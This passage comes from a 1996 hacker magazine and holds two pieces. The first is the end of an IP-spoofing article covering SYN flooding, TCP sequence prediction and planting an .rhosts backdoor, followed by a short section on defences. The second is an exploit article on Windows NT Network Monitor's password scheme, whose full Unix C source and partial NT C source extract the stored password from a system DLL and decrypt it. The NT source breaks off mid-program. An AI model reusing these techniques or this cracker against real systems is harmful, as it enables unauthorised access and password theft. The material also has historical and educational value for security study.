  11977.         One often overlooked, but critical factor in IP-spoofing
  11978. is the fact that the attack is blind.  The attacker is going to be
  11979. taking over the identity of a trusted host in order to subvert the
  11980. security of the target host.  The trusted host is disabled using the
  11981. method described below.  As far as the target knows, it is carrying on
  11982. a conversation with a trusted pal.  In reality, the attacker is
  11983. sitting off in some dark corner of the Internet, forging packets
  11984. puportedly from this trusted host while it is locked up in a denial
  11985. of service battle.  The IP datagrams sent with the forged IP-address
  11986. reach the target fine (recall that IP is a connectionless-oriented
  11987. protocol--  each datagram is sent without regard for the other end)
  11988. but the datagrams the target sends back (destined for the trusted
  11989. host) end up in the bit-bucket.  The attacker never sees them.  The
  11990. intervening routers know where the datagrams are supposed to go.  They
  11991. are supposed to go the trusted host.  As far as the network layer is
  11992. concerned, this is where they originally came from, and this is where
  11993. responses should go.  Of course once the datagrams are routed there,
  11994. and the information is demultiplexed up the protocol stack, and
  11995. reaches TCP, it is discarded (the trusted host's TCP cannot respond--
  11996. see below).  So the attacker has to be smart and *know* what was sent,
  11997. and *know* what reponse the server is looking for.  The attacker
  11998. cannot see what the target host sends, but she can *predict* what it
  11999. will send; that coupled with the knowledge of what it *will* send,
  12000. allows the attacker to work around this blindness.
  12001.  
  12002.  
  12003.         --[ Patterns of Trust ]--
  12004.  
  12005.  
  12006.         After a target is choosen the attacker must determine the
  12007. patterns of trust (for the sake of argument, we are going to assume
  12008. the target host *does* in fact trust somebody.  If it didn't, the
  12009. attack would end here).  Figuring out who a host trusts may or may
  12010. not be easy.  A 'showmount -e' may show where filesystems are
  12011. exported, and rpcinfo can give out valuable information as well.
  12012. If enough background information is known about the host, it should
  12013. not be too difficult.  If all else fails, trying neighboring IP
  12014. addresses in a brute force effort may be a viable option.
  12015.  
  12016.  
  12017.         --[ Trusted Host Disabling Using the Flood of Sins ]--
  12018.  
  12019.  
  12020.         Once the trusted host is found, it must be disabled.  Since
  12021. the attacker is going to impersonate it, she must make sure this host
  12022. cannot receive any network traffic and foul things up.  There are
  12023. many ways of doing this, the one I am going to discuss is TCP SYN
  12024. flooding.
  12025.         A TCP connection is initiated with a client issuing a
  12026. request to a server with the SYN flag on in the TCP header.  Normally
  12027. the server will issue a SYN/ACK back to the client identified by the
  12028. 32-bit source address in the IP header.  The client will then send an
  12029. ACK to the server (as we saw in figure 1 above) and data transfer
  12030. can commence.  There is an upper limit of how many concurrent SYN
  12031. requests TCP can process for a given socket, however.  This limit
  12032. is called the backlog, and it is the length of the queue where
  12033. incoming (as yet incomplete) connections are kept.  This queue limit
  12034. applies to both the number of imcomplete connections (the 3-way
  12035. handshake is not complete) and the number of completed connections
  12036. that have not been pulled from the queue by the application by way of
  12037. the accept() system call.  If this backlog limit is reached, TCP will
  12038. silently discard all incoming SYN requests until the pending
  12039. connections can be dealt with.  Therein lies the attack.
  12040.         The attacking host sends several SYN requests to the TCP port
  12041. she desires disabled.  The attacking host also must make sure that
  12042. the source IP-address is spoofed to be that of another, currently
  12043. unreachable host (the target TCP will be sending it's response to
  12044. this address.  (IP may inform TCP that the host is unreachable,
  12045. but TCP considers these errors to be transient and leaves the
  12046. resolution of them up to IP (reroute the packets, etc) effectively
  12047. ignoring them.)  The IP-address must be unreachable because the
  12048. attacker does not want any host to recieve the SYN/ACKs that will be
  12049. coming from the target TCP (this would result in a RST being sent to
  12050. the target TCP, which would foil our attack).  The process is as
  12051. follows:
  12052.  
  12053.                 fig(2)
  12054.  
  12055. 1       Z(x)    ---SYN--->      B
  12056.  
  12057.         Z(x)    ---SYN--->      B
  12058.  
  12059.         Z(x)    ---SYN--->      B
  12060.  
  12061.         Z(x)    ---SYN--->      B
  12062.  
  12063.         Z(x)    ---SYN--->      B
  12064.  
  12065.                 ...
  12066.  
  12067. 2       X    <---SYN/ACK---     B
  12068.  
  12069.         X    <---SYN/ACK---     B
  12070.  
  12071.                 ...
  12072.  
  12073. 3       X      <---RST---       B
  12074.  
  12075.  
  12076. At (1) the attacking host sends a multitude of SYN requests to the
  12077. target (remember the target in this phase of the attack is the
  12078. trusted host) to fill it's backlog queue with pending connections.
  12079. (2) The target responds with SYN/ACKs to what it believes is the
  12080. source of the incoming SYNs.  During this time all further requests
  12081. to this TCP port will be ignored.
  12082.         Different TCP implementations have different backlog sizes.
  12083. BSD generally has a backlog of 5 (Linux has a backlog of 6).  There
  12084. is also a 'grace' margin of 3/2.  That is, TCP will allow up to
  12085. backlog*3/2+1 connections.  This will allow a socket one connection
  12086. even if it calls listen with a backlog of 0.
  12087.  
  12088.         AuthNote: [For a much more in-depth treatment of TCP SYN
  12089. flooding, see my definitive paper on the subject.  It covers the
  12090. whole process in detail, in both theory, and practice.  There is
  12091. robust working code, a statistical analysis, and a legnthy paper.
  12092. Look for it in issue 49 of Phrack. -daemon9 6/96]
  12093.  
  12094.  
  12095.         --[ Sequence Number Sampling and Prediction ]--
  12096.  
  12097.  
  12098.         Now the attacker needs to get an idea of where in the 32-bit
  12099. sequence number space the target's TCP is.  The attacker connects to
  12100. a TCP port on the target (SMTP is a good choice) just prior to launching
  12101. the attack and completes the three-way handshake.  The process is
  12102. exactly the same as fig(1), except that the attacker will save the
  12103. value of the ISN sent by the target host.  Often times, this process is
  12104. repeated several times and the final ISN sent is stored.  The attacker
  12105. needs to get an idea of what the RTT (round-trip time) from the target
  12106. to her host is like.  (The process can be repeated several times, and an
  12107. average of the RTT's is calculated.)  The RTT is necessary in being
  12108. able to accuratly predict the next ISN.  The attacker has the baseline
  12109. (the last ISN sent) and knows how the sequence numbers are incremented
  12110. (128,000/second and 64,000 per connect) and now has a good idea of
  12111. how long it will take an IP datagram to travel across the Internet to
  12112. reach the target (approximately half the RTT, as most times the
  12113. routes are symmetrical).  After the attacker has this information, she
  12114. immediately proceeds to the next phase of the attack (if another TCP
  12115. connection were to arrive on any port of the target before the
  12116. attacker was able to continue the attack, the ISN predicted by the
  12117. attacker would be off by 64,000 of what was predicted).
  12118.         When the spoofed segment makes it's way to the target,
  12119. several different things may happen depending on the accuracy of
  12120. the attacker's prediction:
  12121. - If the sequence number is EXACTly where the receiving TCP expects
  12122. it to be, the incoming data will be placed on the next available
  12123. position in the receive buffer.
  12124. - If the sequence number is LESS than the expected value the data
  12125. byte is considered a retransmission, and is discarded.
  12126. - If the sequence number is GREATER than the expected value but
  12127. still within the bounds of the receive window, the data byte is
  12128. considered to be a future byte, and is held by TCP, pending the
  12129. arrival of the other missing bytes.  If a segment arrives with a
  12130. sequence number GREATER than the expected value and NOT within the
  12131. bounds of the receive window the segment is dropped, and TCP will
  12132. send a segment back with the *expected* sequence number.
  12133.  
  12134.  
  12135.         --[ Subversion... ]--
  12136.  
  12137.  
  12138.         Here is where the main thrust of the attack begins:
  12139.  
  12140.                 fig(3)
  12141.  
  12142. 1       Z(b)    ---SYN--->      A
  12143.  
  12144. 2       B     <---SYN/ACK---    A
  12145.  
  12146. 3       Z(b)    ---ACK--->      A
  12147.  
  12148. 4       Z(b)    ---PSH--->      A
  12149.  
  12150.                 [...]
  12151.  
  12152.  
  12153. The attacking host spoofs her IP address to be that of the trusted
  12154. host (which should still be in the death-throes of the D.O.S. attack)
  12155. and sends it's connection request to port 513 on the target (1).  At
  12156. (2), the target responds to the spoofed connection request with a
  12157. SYN/ACK, which will make it's way to the trusted host (which, if it
  12158. *could* process the incoming TCP segment, it would consider it an
  12159. error, and immediately send a RST to the target).  If everything goes
  12160. according to plan, the SYN/ACK will be dropped by the gagged trusted
  12161. host.  After (1), the attacker must back off for a bit to give the
  12162. target ample time to send the SYN/ACK (the attacker cannot see this
  12163. segment).  Then, at (3) the attacker sends an ACK to the target with
  12164. the predicted sequence number (plus one, because we're ACKing it).
  12165. If the attacker is correct in her prediction, the target will accept
  12166. the ACK.  The target is compromised and data transfer can
  12167. commence (4).
  12168.         Generally, after compromise, the attacker will insert a
  12169. backdoor into the system that will allow a simpler way of intrusion.
  12170. (Often a `cat + + >> ~/.rhosts` is done.  This is a good idea for
  12171. several reasons: it is quick, allows for simple re-entry, and is not
  12172. interactive.  Remember the attacker cannot see any traffic coming from
  12173. the target, so any reponses are sent off into oblivion.)
  12174.  
  12175.  
  12176.         --[ Why it Works ]--
  12177.  
  12178.  
  12179.         IP-Spoofing works because trusted services only rely on
  12180. network address based authentication.  Since IP is easily duped,
  12181. address forgery is not difficult.  The hardest part of the attck is
  12182. in the sequence number prediction, because that is where the guesswork
  12183. comes into play.  Reduce unknowns and guesswork to a minimum, and
  12184. the attack has a better chance of suceeding.  Even a machine that
  12185. wraps all it's incoming TCP bound connections with Wietse Venema's TCP
  12186. wrappers, is still vulnerable to the attack.  TCP wrappers rely on a
  12187. hostname or an IP address for authentication...
  12188.  
  12189.  
  12190.                 [SECTION III. PREVENTITIVE MEASURES]
  12191.  
  12192.  
  12193.         ...A stich in time, saves nine...
  12194.  
  12195.  
  12196.         --[ Be Un-trusting and Un-trustworthy ]--
  12197.  
  12198.  
  12199.         One easy solution to prevent this attack is not to rely
  12200. on address-based authentication.  Disable all the r* commands,
  12201. remove all .rhosts files and empty out the /etc/hosts.equiv file.
  12202. This will force all users to use other means of remote access
  12203. (telnet, ssh, skey, etc).
  12204.  
  12205.  
  12206.         --[ Packet Filtering ]--
  12207.  
  12208.  
  12209.         If your site has a direct connect to the Internet, you
  12210. can use your router to help you out.  First make sure only hosts
  12211. on your internal LAN can particpate in trust-relationships (no
  12212. internal host should trust a host outside the LAN).  Then simply
  12213. filter out *all* traffic from the outside (the Internet) that
  12214. puports to come from the inside (the LAN).
  12215.  
  12216.  
  12217.         --[ Cryptographic Methods ]--
  12218.  
  12219.  
  12220.         An obvious method to deter IP-spoofing is to require
  12221. all network traffic to be encrypted and/or authenticated.  While
  12222. several solutions exist, it will be a while before such measures are
  12223. deployed as defacto standards.
  12224.  
  12225.  
  12226.         --[ Initial Sequence Number Randomizing ]--
  12227.  
  12228.  
  12229.         Since the sequence numbers are not choosen randomly (or
  12230. incremented randomly) this attack works.  Bellovin describes a
  12231. fix for TCP that involves partitioning the sequence number space.
  12232. Each connection would have it's own seperate sequence number space.
  12233. The sequence numbers would still be incremented as before, however,
  12234. there would be no obvious or implied relationship between the
  12235. numbering in these spaces.  Suggested is the following formula:
  12236.  
  12237.         ISN=M+F(localhost,localport,remotehost,remoteport)
  12238.  
  12239. Where M is the 4 microsecond timer and F is a cryptographic hash.
  12240. F must not be computable from the outside or the attacker could
  12241. still guess sequence numbers.  Bellovin suggests F be a hash of
  12242. the connection-id and a secret vector (a random number, or a host
  12243. related secret combined with the machine's boot time).
  12244.  
  12245.  
  12246.                 [SECTION IV.  SOURCES]
  12247.  
  12248.  
  12249.         -Books:         TCP/IP Illustrated vols. I, II & III
  12250.         -RFCs:          793, 1825, 1948
  12251.         -People:        Richard W. Stevens, and the users of the
  12252.                         Information Nexus for proofreading
  12253.         -Sourcecode:    rbone, mendax, SYNflood
  12254.  
  12255.  
  12256. This paper made possible by a grant from the Guild Corporation.
  12257.                              ==Phrack Magazine==
  12258.  
  12259.              Volume Seven, Issue Forty-Eight, File 15 of 18
  12260.  
  12261.  
  12262.         Windows NT Network Monitor Exploitation
  12263.  
  12264.                  NetMon Encryption Hammer
  12265.             
  12266.                      by the AON and Route 
  12267.                for Phrack Magazine
  12268.              May 1996 Guild productions, kid
  12269.  
  12270.              comments to daemon9@netcom.com
  12271.  
  12272.        Full exploit including binary dll's and execuatables:
  12273.     ftp.infonexus.com/pub/TooldOfTheTrade/Windows/NT/netMonExploit.tgz 
  12274.  
  12275.  
  12276.     [The intro]
  12277.  
  12278.     The Microsoft Network Monitor is a packet sniffer that runs under NT.  
  12279. It is a very robust and versatile packet sniffer, offering much more then
  12280. simple ethernet frame capturing.  It packs a robust capture/display filter
  12281. language, powerful protocol parsers, and one snappy GUI.  NetMon is 
  12282. delivered as part of the SMS package.  The user portion of the program 
  12283. calls upon the services of the Network Monitor Agent, which is a kernel driver
  12284. that ships with NT (3.5.x for sure, but I don't know about 3.1).  The Network 
  12285. Monitor Agent also provides an interface for a remote machine to connect and 
  12286. capture local data, provided it passes authentication. To restrict access, 
  12287. Network Monitor Agent utilizes a password authentication scheme.  Access has 
  12288. two tiers: priviledge to view previously captured sessions, and priviledge to 
  12289. actually use the sniffer to place the ethernet card in promiscuous mode.  The 
  12290. acutal encrypted password is stored as a 32-byte binary string in a 
  12291. dynamically linked library file called BHSUPP.DLL.  We have written code to 
  12292. extract this password from the dll and decyrpt it; we have broken the 
  12293. Microsoft Network Monitor password authentication system.
  12294.  
  12295.  
  12296.     [The low-down]
  12297.  
  12298.     The encrypted string is kept as binary data in: 
  12299. %SystemRoot%\system32\BHSUPP.DLL (in a default installation at least). 
  12300. BHSUPP.DLL is known to be different sizes between versions, so we cannot look 
  12301. for the encrypted string at a specific offset each time.  Instead we must 
  12302. search for a flag, and seek 32-bytes past this flag.  The flag is the 16-byte
  12303. string: "RTSS&G--BEGIN--".  (As a matter of note, there is a terminating 
  12304. footer also: "RTSS&G--END--".)
  12305.  
  12306.  
  12307.     [The encrypted truth]
  12308.  
  12309.     It is a simple encryption function, that takes random length string 
  12310. and returns 256-bit encrypted output.  It may appear to be a hash, rather 
  12311. than a block cipher, but it is not.  It does take a random length input,
  12312. and produce a fixed output, but the input is always padded to 32-bytes
  12313. (with nulls if necessary).  The input to the function is a user defined
  12314. arbitrary string.  The input is truncated to 16 bytes and then to pad 
  12315. out the array, the whole original password string is concatenated  on the 
  12316. truncated version, starting at the 16th byte.  It doesn't matter if the
  12317. resulting string is longer than 32 bytes, as the cipher ignores anything
  12318. past the 32nd byte.  So: "loveKillsTheDemon" becomes: "loveKillsTheDemo" 
  12319. and then: "loveKillsTheDemoloveKillsTheDemon".  If your password is  
  12320. smaller than 16  bytes, we get the 'hole-in-password' phenomena.  Since 
  12321. the array is intialized will nulls, and the password is still folded over to 
  12322. the 16th byte, these nulls remain.  This is easily visible from the first line
  12323. of output in our exploit code.  It also accepts empty password strings 
  12324. readily, without choking, which all Microsoft products seem willing to do all 
  12325. to easily.
  12326.  
  12327.     [The algorithm]
  12328.  
  12329.     The 32-byte string is put through 32 rounds of identical operations.
  12330. The outer for loop controls the value of the byte to be XORed with the
  12331. entire array that round (except for itself, see below).  The inner loop steps
  12332. through the entire byte array.  Each byte is permuted a total of 31 times 
  12333. (The discrepency comes from the test case where i must not be equal to j in 
  12334. order for a character to be permuted.  It would make no sense to XOR a byte 
  12335. with itself).  So, there are a total of 992 operations.  The actual 
  12336. encryption algorithm is quite simple:
  12337.  
  12338. In C:            if(i!=j)mix[j]^=mix[i]+(i^j)+j;
  12339.  
  12340. In English:        if i is NOT equal to j, the j indexed char of mix is 
  12341.             assigned the value of the j indexed char of mix XORed 
  12342.             with the i indexed char of mix PLUS i XORed with j 
  12343.             PLUS j.
  12344.  
  12345. Mathematically:        1) i ^ j = k
  12346.             2) k + j = l
  12347.             3) l + mix[i] = m
  12348.             4) m ^ mix[j] = x
  12349.  
  12350.             OR
  12351.  
  12352.             ((i ^ j) + j + mix[i]) ^ mix[j] = x 
  12353.  
  12354.  
  12355.     The methods used for obscurity are exclusive OR (XOR) and binary 
  12356. addition, (see the appendix if you are umfamiliar with these bitwise 
  12357. operations) with completely known vectors.  The only unknown in the whole 
  12358. equation is the user entered password, fleshed out to 32-bytes.  These 32
  12359. bytes are taken through 32 rounds of permutations.  Simple and concise, 
  12360. with no key material dropped, this algorithm is not lossy.  Since it is not 
  12361. lossy it is 100% reversible, both in theory and practice.  In fact, since we 
  12362. know the values of the counters i and j, throughout the entire encryption 
  12363. process, decryption is simply a matter of reproducing these values in the 
  12364. proper order.  Since the output of the encryption process is the input, 
  12365. taken through 32 rounds of identical permutations, with known vectors, 
  12366. we simply need to reverse this process.
  12367.  
  12368.     [The code]
  12369.  
  12370.     There are two versions of the exploit available.  A Windows NT version
  12371. and, for those of you without access to an expensive NT-native compiler, 
  12372. there is a Unix version as well.  The NT version is a console-based app, as
  12373. GUI code would be a waste of time.  The full package of this exploit, along
  12374. with an NT exexcutable and sample DLL's is available from:
  12375.     ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz 
  12376.  
  12377.  
  12378.     [The discussion]
  12379.  
  12380.     The ramifications of this weak encryption in Network Monitor Agent are 
  12381. many.  First off, the developers of Network Monitor Agent *didn't* use the 
  12382. standard security mechanisms of Windows NT.  This may be because the driver is
  12383. a kernel mode driver, and in NT the kernel is a trusted enity, therefore 
  12384. the standard security API (of Win32) does not apply in the kernel making it 
  12385. harder to do user authentication.  It also appears that they were trying to 
  12386. achieve a mechanism based not on priviledge, but on knowledge.  It is very 
  12387. likely that in secured environment not all administrators should be able to 
  12388. sniff the network.  The problem is they did a *poor* job of securing a 
  12389. powerful utility.
  12390.     The most straight forward attack is use Network Monitor to sniff the 
  12391. network (where you weren't suppose to be able to) for priviledged user data or
  12392. passwords in a heterogeneous environment (since native NT networking does not 
  12393. send password information in the clear, but standard TCP traffic from Unix
  12394. is sent clear).  The rest of the attacks would come from shabby administration
  12395. , such as the administrator used the password for the admin account and the 
  12396. capture password in Network Monitor Agent (stupid, but likely) or the 
  12397. same password for Network Monitor Agent on all machines across the network.
  12398.     In order to use the exploit utility, one must have read priviledge for 
  12399. BHSUPP.DLL which is installed into %SystemRoot%\system32 by default.  This 
  12400. is not a remote attack, but rather a stepping stone to gain priviledged 
  12401. information when one is under-priviledged.
  12402.  
  12403.     [The moral]
  12404.  
  12405.     Time and time again we see either shody implementations of trusted
  12406. algorithms, or, like in this case, just plain bad cryptography.  Under ITAR,
  12407. most secure cryptographic algorithms are classified as munitions, and are not
  12408. exportable from this country.  The funny thing is, under current law, one-way
  12409. hashing functions are *not* restricted (that is why all Unix variants can ship
  12410. with the standard crypt(3) libraries and executables).  This authentication
  12411. scheme could have *easily* been replaced by MD5, the same one-way hash used
  12412. by PGP.  At least then, the complexity of an attack would be increased to
  12413. a brute-force known-plaintext sweep of key values...
  12414.  
  12415.  
  12416.  
  12417.     [The appendix]
  12418.  
  12419.     For the binary-declined...
  12420.  
  12421. Exclusive OR
  12422.  
  12423. The XOR operation is a bitwise operation with the following truth table:
  12424.  
  12425.     XOR| 1 | 0 |        The Exclusive OR operation simply says:
  12426.     -------------        "...Hmmm, if I have a 1 and a 0, I'll spit
  12427.     1  | 0 | 1 |         out a 1.  Anything else, a 0..."
  12428.     -------------
  12429.     0  | 1 | 0 |
  12430.  
  12431.  
  12432. Binary addition
  12433.  
  12434. Binary addition is analogous to base10 addition.  However, each place holds
  12435. 2^n instead of 10^n...
  12436.  
  12437.     add| 1 | 0 |         base10:        base2:
  12438.     -------------            11            1011
  12439.     1  |1 0| 1 |            + 5          + 0101
  12440.     -------------              ---          ------
  12441.     0  | 1 | 0 |                16         10000
  12442.  
  12443.  
  12444.  
  12445.  
  12446. This exploit made possbile by a grant from the Guild corporation.
  12447.  
  12448. - May 07, 1996 route/aon
  12449.  
  12450.  
  12451.     [The Sourcecode]
  12452.     [Unix Version]
  12453.  
  12454. /*
  12455.  
  12456. Network Monitor Exploitation code, Unix version
  12457. coded by daemon9
  12458. The Guild, 1996
  12459.  
  12460. */
  12461.  
  12462.  
  12463. #include<string.h>
  12464. #include<stdio.h>
  12465. #include<fcntl.h>
  12466.  
  12467. #define fbufsize     8192
  12468. #define flag         "RTSS&G--BEGIN--"
  12469. #define VERSION        "Unix version\n"
  12470. #define BUFSIZE     48
  12471. #define DLLNAME     "./BHSUPP.DLL"
  12472.  
  12473. int main()
  12474. {
  12475.     char *swirl(char *,int);
  12476.     char *recover(char *);
  12477.     void hexonx(char *);
  12478.  
  12479.     char werd[]={"\n\n\n\n.this code made possible by a grant from the Guild corporation.\n\0"};
  12480.     char *plain,*tmp,*fname,*encrypted;
  12481.     int c;
  12482.  
  12483.     printf(werd);
  12484.     printf("\nNetMon Password Decryption Engine ");
  12485.     printf(VERSION);
  12486.     printf("\t1.\t\tEncrypt a plaintext password from STDIN.\n");
  12487.     printf("\t2.\t\tDecrypt a plaintext password from the dll.\n");
  12488.     tmp=(char *)malloc(10);     /* Can't switch getchar() as it locks the */
  12489.     bzero(tmp,10);             /* fucking stream and makes futher I/O buggy*/
  12490.     switch(atoi(gets(tmp))){
  12491.         case 1:
  12492.             printf("Enter password to be encrypted (note echo is on, as it would be a moot point\nto turn it off)\n->");
  12493.             plain=(char *)malloc(BUFSIZE);
  12494.             bzero(plain,sizeof(BUFSIZE)); 
  12495.             gets(plain); 
  12496.             hexonx(swirl(plain,0));
  12497.             break;
  12498.         case 2:
  12499.             printf("Enter name and path of DLL [./BHSUPP.DLL]:");
  12500.             fname=(char *)malloc(BUFSIZE);
  12501.             bzero(fname,sizeof(BUFSIZE));
  12502.             gets(fname);
  12503.             if(fname[0]==0)strcpy(fname,DLLNAME);
  12504.             if(!(encrypted=recover(fname))){
  12505.                 printf("Could not locate flag\n");
  12506.                 exit(1);
  12507.             }
  12508.             hexonx(swirl(encrypted,1));            
  12509.             break;
  12510.         default:
  12511.             printf("\nFine.\n");
  12512.             exit(0);
  12513.     }
  12514.     return 0;    
  12515. }
  12516.  
  12517. /*
  12518. swirl is the encryption/decryption function.  It takes an arbitrary length
  12519. string and, depending on the value of the mode variable, encrypts it or
  12520. decrypts it.  It returns a pointer to the string.
  12521. */
  12522.  
  12523. char *swirl(byteStr,mode)
  12524. char *byteStr;
  12525. int mode;
  12526. {
  12527.     int i=0,j=0;
  12528.     char *mix,roundAndround[32][32];
  12529.     void hexonx(char *);
  12530.  
  12531.     mix=(char *)malloc(sizeof(byteStr));
  12532.  
  12533.  
  12534.     if(!mode){
  12535.         memset(mix,0,32);            /* set 32 bytes of memory to 0 */
  12536.         strncpy(mix,byteStr,16);              /* copy the first 16 bytes of the password into the mix*/
  12537.         memcpy(&mix[16],byteStr,strlen(byteStr));   /* copy password into the 16th char of the mix; if mix and plain overlap, problems occur */
  12538.  
  12539.         printf("Password upon entering encryption rounds:\n");
  12540.         hexonx(mix);
  12541.         printf("\n\nbeginning 32 rounds of 'encryption'\n");
  12542.         for(i=0;i<32;i++)for(j=0;j<32;j++)if(i!=j){
  12543.             mix[j]^=mix[i]+(i^j)+j;            /* Sekret Enkripsion occurs here... */
  12544.             memcpy(&roundAndround[i][0],mix,32);    /* save a copy of each round */
  12545.                           }
  12546.         printf("\nDo you wish to view the encryption process round by round?[y]");
  12547.         switch(toupper(getchar())){
  12548.             case 'N':
  12549.                 break;
  12550.             case 'Y':
  12551.             default:
  12552.             for(i=0;i<32;i++){
  12553.                 printf("round %d:\n",i+1);         /* print the rounds out in hex */
  12554.                 hexonx(&roundAndround[i][0]);
  12555.                 getc(stdin);
  12556.             }
  12557.         }
  12558.         printf("\nEncrypted output:\n");
  12559.         return(mix);
  12560.     }
  12561.     if(mode){
  12562.         strncpy(mix,byteStr,32);
  12563.         for(i=31;i>=0;i--)for(j=31;j>=0;j--)if(i!=j)mix[j]^=mix[i]+(i^j)+j;
  12564.         mix[32]=0;        
  12565.         printf("\n\n\nThe plaintext is: %s\nIn hex:\n",mix);
  12566.         return(mix);
  12567.     }
  12568. }
  12569.  
  12570. /* 
  12571. hexonx simply prints out 32 bytes of hexidecimal characters.
  12572. */
  12573.  
  12574. void hexonx(byteStr)
  12575. char *byteStr;
  12576. {
  12577.     int i=0;
  12578.     for(;i<32;i++)printf("0x%x ",byteStr[i]);
  12579.     printf("\n");
  12580. }
  12581.  
  12582.  
  12583. /*
  12584. recover attempts to read the encrypted string from the dll 
  12585. */
  12586.  
  12587. char *recover(fname)
  12588. char *fname;
  12589. {
  12590.  
  12591.     char buffer[fbufsize],*pass;
  12592.     int fd,i=0,j=0,demonFlag=0,offset,bufOffset=0;
  12593.  
  12594.     if((fd=open(fname,O_RDONLY))<=0){
  12595.         fprintf(stderr,"Cannot open %s\n",fname);
  12596.         exit(1);
  12597.     }
  12598.     while(read(fd,buffer,8192)){
  12599.         i=0;
  12600.         while(i<fbufsize&&!demonFlag){
  12601.                 switch(buffer[i-4]){
  12602.                     case 'R':
  12603.                         if(buffer[i-3]=='T'&&buffer[i-2]=='S'&&buffer[i-1]=='S'&&buffer[i+1]=='G'&&buffer[i+2]=='-'&&buffer[i+3]=='-'&&buffer[i+4]=='B'&&buffer[i+5]=='E'&&buffer[i+6]=='G'&&buffer[i+7]=='I'&&buffer[i+8]=='N'&&buffer[i+9]=='-'&&buffer[i+10]=='-'){
  12604.                             demonFlag++;
  12605.                             bufOffset=i;
  12606.     /* Password is 32 bytes past end of header */    offset=j-4;
  12607.                             printf("Encrypted Token Flag: '%s' located at offset 0x%x\n",flag,offset);
  12608.                             printf("Encrypted password should be located at offset 0x%x\n",offset+48);
  12609.                         }
  12610.                         break;
  12611.                     default:
  12612.                 }
  12613.         i++;
  12614.         j++;
  12615.         }        
  12616.     if(demonFlag)break;
  12617.     }
  12618.     if(!offset)return(0);
  12619.     pass=(char *)malloc(BUFSIZE);
  12620.     bzero(pass,32);
  12621.     memcpy(pass,&buffer[bufOffset-4+48],32);
  12622.     
  12623.     printf("\nDo you wish to view the encrypted password?[y]");
  12624.         switch(toupper(getchar())){
  12625.             case 'N':
  12626.                 break;
  12627.             case 'Y':
  12628.             default:
  12629.                 hexonx(pass);
  12630.                 getc(stdin);
  12631.         }
  12632.     return(pass);
  12633. }
  12634.  
  12635.  
  12636.     [The Sourcecode]
  12637.     [NT Version]
  12638.  
  12639.  
  12640.  
  12641. //    A Guild Production  1996  //
  12642. //    Constructed by AON  //
  12643.  
  12644. #define STRICT
  12645. #define MAX_FILE_SIZE 24576                        //if BHSUPP.DLL grows, so must this
  12646.             
  12647. #include <windows.h>
  12648. #include <stdio.h>
  12649.  
  12650. void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword);
  12651. BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword);
  12652. void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile);
  12653.  
  12654. HANDLE g_hStdIn, g_hStdOut;                        //global declaration of StandardIN and OUT
  12655.  
  12656.  
  12657. //    This is a console app.  ReadFile and WriteFile used throughout so StdIN and StdOUT
  12658. //  can be redirected.
  12659.  
  12660. void main(int argc, char* argv[])            
  12661. {
  12662.     HANDLE hTargetFile;                        
  12663.     BYTE lpEncryptedPassword[32];        
  12664.     char lpszPlaintextPassword[17] = {0};
  12665.     char lpszOutputBuffer[80];
  12666.     char lpszTargetFile[MAX_PATH] = {0};
  12667.     char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename]\n";
  12668.     LPTSTR lpszSystemDirectory = NULL;
  12669.     UINT nCount, nCount2;
  12670.     
  12671.     //set global handles
  12672.     
  12673.     g_hStdIn = GetStdHandle(STD_INPUT_HANDLE);    
  12674.     g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);
  12675.  
  12676.     //check for standard NT help switch
  12677.     
  12678.     if(argc > 1 && argv[1][0] == '/' && argv[1][1] == '?')
  12679.     {
  12680.         //display usage info
  12681.         
  12682.         WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL);
  12683.             
  12684.         //exit with success
  12685.         
  12686.         ExitProcess(0L);
  12687.     }
  12688.     
  12689.     //if path and file name not specified on commandline try system directory first, because
  12690.     //BHSUPP.DLL is probably there
  12691.     if(argc == 1)
  12692.     {
  12693.         //findout how long path is for mem alloc
  12694.         nCount = GetSystemDirectory(lpszSystemDirectory, 0);    
  12695.                                                             
  12696.         //do alloc of that size
  12697.         lpszSystemDirectory = malloc(nCount);        
  12698.     
  12699.         if(lpszSystemDirectory == NULL)
  12700.         {
  12701.             WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
  12702.                       41, &nCount, NULL);
  12703.  
  12704.             ExitProcess(1L);
  12705.         }
  12706.  
  12707.         //get system dir
  12708.         GetSystemDirectory(lpszSystemDirectory, nCount);        
  12709.     
  12710.         //append file name to system directory
  12711.         sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory);
  12712.         
  12713.         //release memory
  12714.         free(lpszSystemDirectory);
  12715.     }
  12716.     
  12717.     else
  12718.     {
  12719.         //get the commandline input
  12720.         strcpy(lpszTargetFile, argv[1]);
  12721.     }
  12722.  
  12723.     //try to open BHSUPP.DLL in the system dir or where the user instructed
  12724.     hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
  12725.                              FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
  12726.                              FILE_FLAG_SEQUENTIAL_SCAN, NULL);
  12727.  
  12728.     //if not on the commandline or in the system dir ask user for path
  12729.     if(hTargetFile == INVALID_HANDLE_VALUE && argc == 1)
  12730.     {
  12731.         GetTargetFileFromUser(&hTargetFile, lpszTargetFile);
  12732.     }
  12733.     
  12734.     //user gave bad path or they don't have read permission on the file
  12735.     else if(hTargetFile == INVALID_HANDLE_VALUE)
  12736.     {
  12737.         //make error string because file open failed
  12738.         nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile);
  12739.  
  12740.         //write out
  12741.         WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
  12742.     
  12743.         //exit with failure
  12744.         ExitProcess(1L);
  12745.     }
  12746.  
  12747.     //retrieve the encrypted password from BHSUPP.DLL
  12748.     if(!GetEncryptedPassword(hTargetFile, lpEncryptedPassword))
  12749.     {
  12750.         WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n",
  12751.                   39, &nCount, NULL);
  12752.  
  12753.         ExitProcess(1L);
  12754.     }
  12755.  
  12756.     //cleanup handle
  12757.     CloseHandle(hTargetFile);
  12758.  
  12759.     //do the decryption here
